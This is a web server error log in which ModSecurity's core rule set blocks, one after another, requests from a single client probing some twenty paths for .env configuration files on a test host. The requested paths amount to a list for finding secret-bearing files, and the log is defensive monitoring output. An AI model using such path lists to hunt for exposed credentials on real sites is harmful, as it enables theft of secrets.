[Sat Mar 21 04:09:53.593396 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample.php"] [unique_id "ab4MAdTas8ZTYtMe0Y3QwQAAAAE"]
[Sat Mar 21 04:09:53.593555 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample.php"] [unique_id "ab4MAdTas8ZTYtMe0Y3QwQAAAAE"]
[Sat Mar 21 04:09:53.888012 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.staging"] [unique_id "ab4MAdTas8ZTYtMe0Y3QwgAAAAE"]
[Sat Mar 21 04:09:53.888172 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.staging"] [unique_id "ab4MAdTas8ZTYtMe0Y3QwgAAAAE"]
[Sat Mar 21 04:09:53.888335 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.staging"] [unique_id "ab4MAdTas8ZTYtMe0Y3QwgAAAAE"]
[Sat Mar 21 04:09:54.182709 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.production"] [unique_id "ab4MAtTas8ZTYtMe0Y3QwwAAAAE"]
[Sat Mar 21 04:09:54.182866 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.production"] [unique_id "ab4MAtTas8ZTYtMe0Y3QwwAAAAE"]
[Sat Mar 21 04:09:54.183023 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.production"] [unique_id "ab4MAtTas8ZTYtMe0Y3QwwAAAAE"]
[Sat Mar 21 04:09:54.477614 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/BACK/.env"] [unique_id "ab4MAtTas8ZTYtMe0Y3QxAAAAAE"]
[Sat Mar 21 04:09:54.477769 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/BACK/.env"] [unique_id "ab4MAtTas8ZTYtMe0Y3QxAAAAAE"]
[Sat Mar 21 04:09:54.477925 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/BACK/.env"] [unique_id "ab4MAtTas8ZTYtMe0Y3QxAAAAAE"]
[Sat Mar 21 04:09:54.893616 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.production"] [unique_id "ab4MAtTas8ZTYtMe0Y3QxQAAAAE"]
[Sat Mar 21 04:09:54.893778 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.production"] [unique_id "ab4MAtTas8ZTYtMe0Y3QxQAAAAE"]
[Sat Mar 21 04:09:54.893944 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.production"] [unique_id "ab4MAtTas8ZTYtMe0Y3QxQAAAAE"]
[Sat Mar 21 04:09:55.283109 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test.local"] [unique_id "ab4MA9Tas8ZTYtMe0Y3QxgAAAAE"]
[Sat Mar 21 04:09:55.283264 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test.local"] [unique_id "ab4MA9Tas8ZTYtMe0Y3QxgAAAAE"]
[Sat Mar 21 04:09:55.283427 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test.local"] [unique_id "ab4MA9Tas8ZTYtMe0Y3QxgAAAAE"]
[Sat Mar 21 04:09:55.703415 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.local"] [unique_id "ab4MA9Tas8ZTYtMe0Y3QxwAAAAE"]
[Sat Mar 21 04:09:55.703575 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.local"] [unique_id "ab4MA9Tas8ZTYtMe0Y3QxwAAAAE"]
[Sat Mar 21 04:09:55.703729 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.local"] [unique_id "ab4MA9Tas8ZTYtMe0Y3QxwAAAAE"]
[Sat Mar 21 04:09:56.063614 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env"] [unique_id "ab4MBNTas8ZTYtMe0Y3QyAAAAAE"]
[Sat Mar 21 04:09:56.063778 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env"] [unique_id "ab4MBNTas8ZTYtMe0Y3QyAAAAAE"]
[Sat Mar 21 04:09:56.063924 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env"] [unique_id "ab4MBNTas8ZTYtMe0Y3QyAAAAAE"]
[Sat Mar 21 04:09:56.359686 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "ab4MBNTas8ZTYtMe0Y3QyQAAAAE"]
[Sat Mar 21 04:09:56.359843 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "ab4MBNTas8ZTYtMe0Y3QyQAAAAE"]
[Sat Mar 21 04:09:56.360012 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "ab4MBNTas8ZTYtMe0Y3QyQAAAAE"]
[Sat Mar 21 04:09:56.654846 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.local"] [unique_id "ab4MBNTas8ZTYtMe0Y3QygAAAAE"]
[Sat Mar 21 04:09:56.655010 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.local"] [unique_id "ab4MBNTas8ZTYtMe0Y3QygAAAAE"]
[Sat Mar 21 04:09:56.655174 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.local"] [unique_id "ab4MBNTas8ZTYtMe0Y3QygAAAAE"]
[Sat Mar 21 04:09:56.972237 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.staging"] [unique_id "ab4MBNTas8ZTYtMe0Y3QywAAAAE"]
[Sat Mar 21 04:09:56.974027 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.staging"] [unique_id "ab4MBNTas8ZTYtMe0Y3QywAAAAE"]
[Sat Mar 21 04:09:56.974202 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.staging"] [unique_id "ab4MBNTas8ZTYtMe0Y3QywAAAAE"]
[Sat Mar 21 04:09:57.273267 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.local"] [unique_id "ab4MBdTas8ZTYtMe0Y3QzAAAAAE"]
[Sat Mar 21 04:09:57.273429 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.local"] [unique_id "ab4MBdTas8ZTYtMe0Y3QzAAAAAE"]
[Sat Mar 21 04:09:57.273584 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.local"] [unique_id "ab4MBdTas8ZTYtMe0Y3QzAAAAAE"]
[Sat Mar 21 04:09:57.568826 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs"] [unique_id "ab4MBdTas8ZTYtMe0Y3QzQAAAAE"]
[Sat Mar 21 04:09:57.568980 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs"] [unique_id "ab4MBdTas8ZTYtMe0Y3QzQAAAAE"]
[Sat Mar 21 04:09:57.569136 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs"] [unique_id "ab4MBdTas8ZTYtMe0Y3QzQAAAAE"]
[Sat Mar 21 04:09:57.863339 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.local"] [unique_id "ab4MBdTas8ZTYtMe0Y3QzgAAAAE"]
[Sat Mar 21 04:09:57.863517 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.local"] [unique_id "ab4MBdTas8ZTYtMe0Y3QzgAAAAE"]
